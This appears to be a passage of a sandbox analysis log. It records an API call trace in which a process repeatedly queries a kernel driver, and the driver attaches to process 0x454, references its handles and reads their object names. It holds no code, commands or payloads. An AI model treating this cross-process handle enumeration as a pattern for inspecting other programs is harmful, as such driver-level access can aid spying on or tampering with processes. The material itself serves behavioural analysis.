0x0 [0245.338] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.338] PsReleaseProcessExitSynchronization () returned 0x2 [0245.338] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.338] ObQueryNameString (in: Object=0xfffff8a000cac6d0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.338] ObfDereferenceObject (Object=0xfffff8a000cac6d0) returned 0x2 [0245.338] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.338] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.338] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.338] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xb0, lpOverlapped=0x0) returned 1 [0245.338] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.338] PsAcquireProcessExitSynchronization () returned 0x0 [0245.338] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.338] ObReferenceObjectByHandle (in: Handle=0x430, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0010bbe70, HandleInformation=0x0) returned 0x0 [0245.338] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.338] PsReleaseProcessExitSynchronization () returned 0x2 [0245.338] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.338] ObQueryNameString (in: Object=0xfffff8a0010bbe70, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.338] ObfDereferenceObject (Object=0xfffff8a0010bbe70) returned 0x7 [0245.338] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.338] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.338] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.339] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xb0, lpOverlapped=0x0) returned 1 [0245.339] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.339] PsAcquireProcessExitSynchronization () returned 0x0 [0245.339] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.339] ObReferenceObjectByHandle (in: Handle=0x438, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0010bbe70, HandleInformation=0x0) returned 0x0 [0245.339] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.339] PsReleaseProcessExitSynchronization () returned 0x2 [0245.339] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.339] ObQueryNameString (in: Object=0xfffff8a0010bbe70, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.339] ObfDereferenceObject (Object=0xfffff8a0010bbe70) returned 0x7 [0245.339] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.339] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.339] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.339] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x116, lpOverlapped=0x0) returned 1 [0245.339] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.339] PsAcquireProcessExitSynchronization () returned 0x0 [0245.339] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.339] ObReferenceObjectByHandle (in: Handle=0x440, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000caa290, HandleInformation=0x0) returned 0x0 [0245.339] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.339] PsReleaseProcessExitSynchronization () returned 0x2 [0245.339] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.339] ObQueryNameString (in: Object=0xfffff8a000caa290, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.339] ObfDereferenceObject (Object=0xfffff8a000caa290) returned 0x2 [0245.339] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.339] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.339] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.339] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xc6, lpOverlapped=0x0) returned 1 [0245.340] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.340] PsAcquireProcessExitSynchronization () returned 0x0 [0245.340] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.340] ObReferenceObjectByHandle (in: Handle=0x44c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037df070, HandleInformation=0x0) returned 0x0 [0245.340] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.340] PsReleaseProcessExitSynchronization () returned 0x2 [0245.340] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.340] ObQueryNameString (in: Object=0xfffffa80037df070, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.340] ObfDereferenceObject (Object=0xfffffa80037df070) returned 0x2 [0245.340] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.340] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.340] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.340] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xc6, lpOverlapped=0x0) returned 1 [0245.340] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.340] PsAcquireProcessExitSynchronization () returned 0x0 [0245.340] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.340] ObReferenceObjectByHandle (in: Handle=0x458, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003813070, HandleInformation=0x0) returned 0x0 [0245.340] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.340] PsReleaseProcessExitSynchronization () returned 0x2 [0245.340] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.340] ObQueryNameString (in: Object=0xfffffa8003813070, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.340] ObfDereferenceObject (Object=0xfffffa8003813070) returned 0x2 [0245.340] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.340] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.340] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.340] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xf8, lpOverlapped=0x0) returned 1 [0245.341] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.341] PsAcquireProcessExitSynchronization () returned 0x0 [0245.341] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.341] ObReferenceObjectByHandle (in: Handle=0x47c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037df760, HandleInformation=0x0) returned 0x0 [0245.341] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.341] PsReleaseProcessExitSynchronization () returned 0x2 [0245.341] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.341] ObQueryNameString (in: Object=0xfffffa80037df760, ObjectNameInfo=0xfffffa80030c5044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030c5044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.341] ObfDereferenceObject (Object=0xfffffa80037df760) returned 0x2 [0245.341] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.341] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.341] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.341] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x78, lpOverlapped=0x0) returned 1 [0245.341] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.341] PsAcquireProcessExitSynchronization () returned 0x0 [0245.341] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.341] ObReferenceObjectByHandle (in: Handle=0x494, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00117b080, HandleInformation=0x0) returned 0x0 [0245.341] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.341] PsReleaseProcessExitSynchronization () returned 0x2 [0245.341] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.341] ObQueryNameString (in: Object=0xfffff8a00117b080, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.341] ObfDereferenceObject (Object=0xfffff8a00117b080) returned 0x2 [0245.341] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.341] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.341] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.341] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xfa, lpOverlapped=0x0) returned 1 [0245.341] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.341] PsAcquireProcessExitSynchronization () returned 0x0 [0245.341] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.342] ObReferenceObjectByHandle (in: Handle=0x4a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0019676a0, HandleInformation=0x0) returned 0x0 [0245.342] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.342] PsReleaseProcessExitSynchronization () returned 0x2 [0245.342] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.342] ObQueryNameString (in: Object=0xfffff8a0019676a0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.342] ObfDereferenceObject (Object=0xfffff8a0019676a0) returned 0x2 [0245.342] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.342] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.342] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.342] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xdc, lpOverlapped=0x0) returned 1 [0245.342] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.342] PsAcquireProcessExitSynchronization () returned 0x0 [0245.342] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.342] ObReferenceObjectByHandle (in: Handle=0x4a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80019dabc0, HandleInformation=0x0) returned 0x0 [0245.342] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.342] PsReleaseProcessExitSynchronization () returned 0x2 [0245.342] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.342] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.342] ObfDereferenceObject (Object=0xfffffa80019dabc0) returned 0xe [0245.342] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.342] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.342] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.342] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0245.342] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.342] PsAcquireProcessExitSynchronization () returned 0x0 [0245.342] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.342] ObReferenceObjectByHandle (in: Handle=0x4ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001176770, HandleInformation=0x0) returned 0x0 [0245.342] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.342] PsReleaseProcessExitSynchronization () returned 0x2 [0245.342] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.342] ObQueryNameString (in: Object=0xfffff8a001176770, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.343] ObfDereferenceObject (Object=0xfffff8a001176770) returned 0x2 [0245.343] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.343] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.343] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.343] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xb0, lpOverlapped=0x0) returned 1 [0245.343] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.343] PsAcquireProcessExitSynchronization () returned 0x0 [0245.343] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.343] ObReferenceObjectByHandle (in: Handle=0x4e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0010bbe70, HandleInformation=0x0) returned 0x0 [0245.343] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.343] PsReleaseProcessExitSynchronization () returned 0x2 [0245.343] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.343] ObQueryNameString (in: Object=0xfffff8a0010bbe70, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.343] ObfDereferenceObject (Object=0xfffff8a0010bbe70) returned 0x7 [0245.343] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.343] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.343] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.343] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0245.343] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.343] PsAcquireProcessExitSynchronization () returned 0x0 [0245.343] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.343] ObReferenceObjectByHandle (in: Handle=0x4f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80038761d0, HandleInformation=0x0) returned 0x0 [0245.343] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.343] PsReleaseProcessExitSynchronization () returned 0x2 [0245.343] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.343] ObQueryNameString (in: Object=0xfffffa80038761d0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.343] ObfDereferenceObject (Object=0xfffffa80038761d0) returned 0x2 [0245.343] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.344] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.344] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.344] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0245.344] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.344] PsAcquireProcessExitSynchronization () returned 0x0 [0245.344] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.344] ObReferenceObjectByHandle (in: Handle=0x4fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800385a2d0, HandleInformation=0x0) returned 0x0 [0245.344] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.344] PsReleaseProcessExitSynchronization () returned 0x2 [0245.344] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.344] ObQueryNameString (in: Object=0xfffffa800385a2d0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.344] ObfDereferenceObject (Object=0xfffffa800385a2d0) returned 0x2 [0245.344] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.344] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.344] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.344] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xc8, lpOverlapped=0x0) returned 1 [0245.344] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.344] PsAcquireProcessExitSynchronization () returned 0x0 [0245.344] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.344] ObReferenceObjectByHandle (in: Handle=0x504, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003873750, HandleInformation=0x0) returned 0x0 [0245.344] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.344] PsReleaseProcessExitSynchronization () returned 0x2 [0245.344] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.344] ObQueryNameString (in: Object=0xfffffa8003873750, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.344] ObfDereferenceObject (Object=0xfffffa8003873750) returned 0x2 [0245.344] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.344] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.344] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.344] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xc8, lpOverlapped=0x0) returned 1 [0245.344] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.345] PsAcquireProcessExitSynchronization () returned 0x0 [0245.345] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.345] ObReferenceObjectByHandle (in: Handle=0x50c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003873600, HandleInformation=0x0) returned 0x0 [0245.345] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.345] PsReleaseProcessExitSynchronization () returned 0x2 [0245.345] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.345] ObQueryNameString (in: Object=0xfffffa8003873600, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.345] ObfDereferenceObject (Object=0xfffffa8003873600) returned 0x2 [0245.345] 